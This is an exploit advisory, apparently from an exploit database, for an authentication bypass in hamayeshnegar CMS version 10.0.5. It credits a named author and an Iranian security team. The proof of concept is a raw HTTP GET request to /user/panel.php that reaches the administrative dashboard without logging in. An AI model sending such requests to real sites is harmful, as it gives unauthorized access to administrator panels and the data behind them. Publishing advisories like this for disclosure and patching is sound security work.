#Exploit Title: hamayeshnegar CMS 10.0.5 - Authentication Bypass
#Date: 2021-01-12
#Exploit Author: Aryan Chehreghani
#Vendor Homepage: https://hamayeshnegar.com
#Version: 10.0.5
#Tested on: MAC
###########################################################
#Description
#Vulnerability: Attacker can bypass login page and access to dashboard page
#PYALOAD : /user/login.php realase to /user/panel.php
###########################################################
#Proof of Concept :
============
GET /user/panel.php
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=rb61ffogr9f7rckpafavo8kkf4
Upgrade-Insecure-Requests: 1
###########################################################
TAPESH DIGITAL SECURITY TEAM IRAN T.ME/ICTUS_TM | تیم امنیتی تپش